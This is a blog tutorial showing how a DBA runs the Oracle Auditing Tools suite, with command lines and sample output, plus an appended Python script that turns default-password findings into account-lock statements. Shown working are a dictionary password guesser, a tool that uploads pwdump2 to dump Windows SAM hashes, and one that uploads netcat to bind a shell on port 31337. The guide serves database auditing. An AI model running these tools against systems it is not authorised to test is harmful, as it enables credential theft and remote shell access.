"Oracle Auditing Tools" for Oracle

This is a guide to the open source utility "Oracle Auditing Tools", which offers password
guessing, a query tool, a listener check and more.

The toolkit consists of the following tools:

- OraclePWGuess (opwg.bat) - A dictionary attack tool that can be used with user-supplied dictionaries or with the built-in support for finding default accounts.
- OracleQuery (oquery.bat) - A minimalistic command line based SQL query tool.
- OracleSamDump (osd.bat) - Connects to the Oracle server and executes TFTP get, to fetch the pwdump2 binary. The server is then pwdump2:ed and the result is returned to the SAM folder of the TFTP server.
- OracleSysExec - Can be run in interactive mode, letting the user specify commands to be executed by the server, or in automatic mode. In automatic mode, netcat is tftp'd over to the server and binds a shell to TCP port 31337.
- OracleTNSCtrl - Is used to query the TNS listener for various information, like the Oracle lsnrctl utility. It is somewhat limited though. Use the help command to see the commands currently implemented.

To run this tool, we need:
 

- Java Runtime Environment or Java Developer Kit
- Oracle JDBC Driver (classes111.zip or classes12.zip)

Before testing, we add the following entries to PATH and CLASSPATH:
 

- Add C:\Program Files\Java\jdk1.5.0_11\bin to PATH
- Edit the .bat file as follows:

opwg.bat

    @echo off
    rem
    rem OracleSamDump by Patrik Karlsson
    set CP=.;C:/Jonathan/OracleServer/jdbc/lib/classes12.jar;ork.jar
    rem @set CP=.;classes12.zip;ork.jar
    java -classpath %CP% ork.OraclePwGuess %*

We run opwg.bat:

    C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>opwg.bat -s hostserver
    Oracle Password Guesser v1.3.1 by patrik@cqure.net
    -------------------------------------------------
    INFO: Running pwcheck on SID DB1
    INFO: Running pwcheck on SID DB2
    Successfully logged in with OLAPSYS/MANAGER
    INFO: Running pwcheck on SID DB3
    Skipping PLSExtProc ...
    INFO: Running pwcheck on SID DB4
    Successfully logged in with DBSNMP/DBSNMP
    INFO: Running pwcheck on SID DB5
    Successfully logged in with OWA_PUBLIC/OWA_PUBLIC
    Successfully logged in with PORTAL30_DEMO/PORTAL30_DEMO
    Successfully logged in with PORTAL30_PUBLIC/PORTAL30_PUBLIC
    Successfully logged in with PORTAL30_SSO_PS/PORTAL30_SSO_PS
    Successfully logged in with PORTAL30_SSO_PUBLIC/PORTAL30_SSO_PUBLIC
    Successfully logged in with TRACESVR/TRACE

That's very good. We now know which Oracle accounts still use default passwords.

We run oquery.bat:

    C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>oquery.bat -s hostserver -d DB1 -u system -p xxxxxx -q "select table_name,table_type from cat"
    OracleQuery v1.3.1 by patrik@cqure.net
    ---------------------------------------
    TABLE_NAME | TABLE_TYPE
    AQ$DEF$_AQCALL | VIEW
    AQ$DEF$_AQERROR | VIEW
    AQ$_INTERNET_AGENTS | TABLE
    AQ$_INTERNET_AGENT_PRIVS | TABLE
    AQ$_QUEUES | TABLE
    AQ$_QUEUE_TABLES | TABLE
    AQ$_SCHEDULES | TABLE
    CATALOG | SYNONYM
    COL | SYNONYM
    DEF$_AQCALL | TABLE
    DEF$_AQERROR | TABLE
    DEF$_CALLDEST | TABLE
    DEF$_DEFAULTDEST | TABLE
    DEF$_DESTINATION | TABLE
    DEF$_ERROR | TABLE
    DEF$_LOB | TABLE
    DEF$_ORIGIN | TABLE

A practical SQL query utility.

We run osd.bat:

    C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>osd.bat -s gold -u system -p cerial -d test
    Oracle Sam Dump v1.3.1 by patrik@cqure.net
    -----------------------------------------
    INFO: Local IP seems to be 140.xxx.x.xxx
    SERVER:[2] Tftp Server thread started.
    INFO: Uploading PWDUMP2 to Oracle Server
    INFO: Dumping the SAM on Oracle Server
    INFO: Fetching sam.txt
    INFO: If all went well, the server SAM file should be in tftproot/sam
    INFO: Cleaning up !
    INFO: Stopping TFTP Server

A good utility for password checking that extends pwdump2 to UNIX via TFTP.

Note: PWDUMP2 is an application which dumps the password hashes (OWFs) from NT's SAM database, whether or not SYSKEY is enabled on the system.

Note: TFTP is an abbreviation of Trivial File Transfer Protocol, a simple form of the File Transfer Protocol (FTP). TFTP uses the User Datagram Protocol (UDP) and provides no security features. It is often used by servers to boot diskless workstations, X-terminals, and routers.

We run otnsctl.bat:

    C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>otnsctl.bat -s hostserver -I
    Oracle TNS Control v1.3.1 by patrik@cqure.net
    --------------------------------------------
    tnscmd> help
    help
    set password - sets the password with which to connect to the listener
    services - shows services
    status - shows status
    version - returns version information
    tnscmd> version
    TNSLSNR for Solaris: Version - Production
    TNS for Solaris: Version - Production
    Unix Domain Socket IPC NT Protocol Adaptor for Solaris: Version Production
    Oracle Bequeath NT Protocol Adapter for Solaris: Version - Production
    TCP/IP NT Protocol Adapter for Solaris: Version - Production

This can be used to secure the Oracle listener.

We run ose.bat:

    C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>ose -s hostserver -u system -p xxxxxx -d test -t Solaris
    OracleSysExec v1.3.1 by patrik@cqure.net
    ---------------------------------------
    INFO: Local IP seems to be 140.xxx.x.xxx
    SERVER:[2] Tftp Server thread started.
    Adding haxxor stuff for Solaris ...
    INFO: Uploading netcat to Oracle Server
    INFO: Sleeping for 2 seconds
    INFO: Creating shell on port 31337
    INFO: Cleaning up !
    INFO: Don't forget to remove netcat when finnished !
    INFO: Stopping TFTP Server

Note: Visit here for more on netcat.

Overall, "Oracle Auditing Tool" is a practical and feasible tool for DBAs to monitor database security issues. Among the tools in "Oracle Auditing Tool", the most impressive one is OraclePWGuess (opwg.bat). I once used the utility offered in "Oracle Metalink Patch 4926128" to check the default Oracle accounts. In a multi-instance environment, that approach requires logging on to each instance separately to run the provided SQL script. With OraclePWGuess (opwg.bat), the only thing we need to do is identify the name of the host server. Then the utility automatically goes through every instance on that server. That's fantastic.
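An added example, not part of the original guide or of the Oracle Auditing Tools project: a short Python script that reads saved opwg.bat output, groups the default-password accounts by SID, and produces an ALTER USER statement for each so the findings can be closed instance by instance. The sample text is constructed from the run shown above, and the function names are this example's own.

```python
import re

# Constructed sample in the format of the opwg.bat output shown above.
SAMPLE = """\
INFO: Running pwcheck on SID DB2
Successfully logged in with OLAPSYS/MANAGER
INFO: Running pwcheck on SID DB3
Skipping PLSExtProc ...
INFO: Running pwcheck on SID DB4
Successfully logged in with DBSNMP/DBSNMP
INFO: Running pwcheck on SID DB5
Successfully logged in with OWA_PUBLIC/OWA_PUBLIC
Successfully logged in with TRACESVR/TRACE
"""

SID_RE = re.compile(r"^INFO: Running pwcheck on SID (\S+)$")
HIT_RE = re.compile(r"^Successfully logged in with ([^/\s]+)/\S+$")
# Unquoted Oracle identifier: a letter, then letters, digits, _ $ #
IDENT_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_$#]*$")


def parse_findings(text):
    """Return {sid: [account, ...]} for every SID the tool checked."""
    findings, sid = {}, None
    for line in map(str.strip, text.splitlines()):
        sid_m, hit_m = SID_RE.match(line), HIT_RE.match(line)
        if sid_m:
            sid = sid_m.group(1)
            findings.setdefault(sid, [])
        elif hit_m and sid is not None and hit_m.group(1) not in findings[sid]:
            findings[sid].append(hit_m.group(1))  # password is not kept
    return findings


def remediation_sql(findings):
    """Return {sid: [ALTER USER ...]} for SIDs that had findings."""
    plan = {}
    for sid, users in findings.items():
        for user in users:
            if not IDENT_RE.match(user):  # never paste odd names into SQL
                raise ValueError("unexpected account name: %r" % user)
            plan.setdefault(sid, []).append(
                "ALTER USER %s PASSWORD EXPIRE ACCOUNT LOCK;" % user)
    return plan


if __name__ == "__main__":
    for sid, stmts in remediation_sql(parse_findings(SAMPLE)).items():
        print("-- SID %s\n%s" % (sid, "\n".join(stmts)))
```

Review the list before running it: an account that a monitoring agent or application still logs in with (DBSNMP is a common case) needs a new password rather than a lock.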

Written by R.Wang Blog: http://www.oraclepoint.com/oralife More Resource: http://www.oraclepoint.com
